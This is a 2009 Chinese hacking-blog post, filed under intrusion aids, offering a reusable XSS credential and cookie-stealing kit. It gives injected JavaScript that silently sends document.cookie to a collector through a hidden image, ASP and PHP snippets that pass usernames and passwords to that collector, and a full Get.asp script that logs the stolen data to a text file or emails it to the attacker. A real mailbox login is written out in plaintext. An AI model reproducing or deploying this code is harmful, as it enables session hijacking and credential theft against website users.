功能测试
                                                           feedsky 抓虾 google reader 鲜果 QQ邮箱 my yahoo 有道
首页 > 入侵辅助 > 正文

XSS/偷取密码/Cookies通用脚本

发布-白银时代 | 查看- | 发表时间-2009-5-2

【白银时代】备注:这东西貌似比较邪恶的说,出了事别来找我,直接找原作者……

来源:http://www.5luyu.cn/article/605.htm

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下
0.jpg


asp.asp或者php.php 或者cookies.htm效果如下
保存文本
 

5.jpg


发送邮件

1.jpg


获取的cookies
3.jpg


截获用户名密码
4.jpg


主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下: 使用方法:
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句 php.php是PHP中使用例子。代码如下: cookies.htm是用来获取Cookies的例子
代码如下: 有任何问题和意见跟帖。。。
另外。
所有的参数可以自己添加。你可以Get.asp?a=abc&b=abc&c=abcZ&...多少个变量都行...Get.asp?账号=abc&密码=abc这样也可以
具体自己用用就明白了。
需要深入处理Cookies的自己根据实际情况调整吧。。
这只是一个通用的。方便例子。呼呼。

普通浏览复制代码打印代码
  1. <%   
  2. username="admin"  
  3. password="admin888"  
  4. %>   
  5. <script src="get.asp?username=<%=username%>&password=<%=password%>" />   
  6. <%   
  7. response.write Response.Cookies()   
  8. %>  

 

普通浏览复制代码打印代码
  1. <?   
  2. $username="admin";   
  3. $password="admin888";   
  4. ?>   
  5. <script src="get.asp?username=<?=$username;?>&password=<?=$password;?>"/>  

 

普通浏览复制代码打印代码
  1. <script>  
  2. var url="Get.asp?cookies="+document.cookie;   
  3. var image = new Image();   
  4. image.style.width = 0;   
  5. image.style.height = 0;   
  6. image.src = url;   
  7. </script>  

 

 

 

普通浏览复制代码打印代码
  1. <%   
  2. SaveFile="pass.txt" '保存获取数据的TXT   
  3. IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件   
  4. YourSendMail="521hack@163.com" '用来发送的邮箱   
  5. YourSendMailUser="521hack" '邮箱登陆用户名   
  6. YourSendMailPass="123456abcf" '邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码...   
  7. YourSendMailServer="smtp.163.com" '邮件服务器   
  8. YourMailTitle="有新截获的数据来了!" '邮件标题   
  9. YourRecvMail="xxxx@qq.com" '收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息   
  10.   
  11. sub sendmail(content)   
  12. On error resume next   
  13. dim JMail    
  14. Set JMail = Server.CreateObject("JMail.Message")    
  15. JMail.Logging = True    
  16. JMail.Charset = "gb2312"    
  17. JMail.ContentType = "text/html"    
  18. JMail.From = YourSendMail   
  19. JMail.FromName = ""&YourSendMailUser   
  20. JMail.MailServerUserName = YourSendMailUser   
  21. JMail.MailServerPassword = YourSendMailPass   
  22. JMail.Priority = 1    
  23. JMail.AddRecipient YourRecvMail   
  24. JMail.Subject = YourMailTitle   
  25. JMail.Body = content   
  26. JMail.Send("smtp.163.com")    
  27. Set JMail = nothing    
  28. If err then    
  29. Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"  
  30. else   
  31. Response.write "发送成功!"  
  32. end if   
  33. end sub   
  34.   
  35. GetPostStr=Request.QueryString   
  36. if GetPostStr="" then   
  37. Response.write "None!"  
  38. end if   
  39.   
  40. if ifsendmail then   
  41. StrTemp=Replace(GetPostStr,"=",":")   
  42. StrTemp=Replace(StrTemp,"&","<br>")   
  43. sendmail(StrTemp)   
  44. else   
  45. set F=server.CreateObject("scripting.filesystemobject")   
  46. set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)   
  47. TempStr=Split(GetPostStr,"&")   
  48. for TempI=0  To Ubound(TempStr)   
  49. I.WriteLine(Replace(TempStr(TempI),"=",":"))   
  50. next   
  51. I.WriteLine(now())   
  52. I.WriteLine("--------------------------------")   
  53. I.close   
  54. Set F=nothing   
  55. end if   
  56. %>  

 

普通浏览复制代码打印代码
  1. %> '闭合上半部分   
  2. 这里是js   
  3. <% '闭合下半部分  
feedsky 抓虾 google reader 鲜果 QQ邮箱 my yahoo 有道
或许你还对下面的文章感兴趣

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

quote 1. 听风
听风 的确很邪恶 顺便说一下 验证码字符太小了 我都快凑到电脑上了才看清。。。

非常的无语
http://www.tfxs.net 2009-5-2 21:00:33 【回复】
quote 2. 874587
874587 已经把验证码取消了……
为啥我看到的都是一样的?
你和粥看到的都很小?
主题问题麽?
http://www.874587.net.ru 2009-5-2 22:19:30 【回复】
最新文章
最近评论
访客留言
管理     | 主题由 SéɑńしΟΟ设计完成。 GHD|wedding dresses
本程序由ΖβしΟɡ搭建。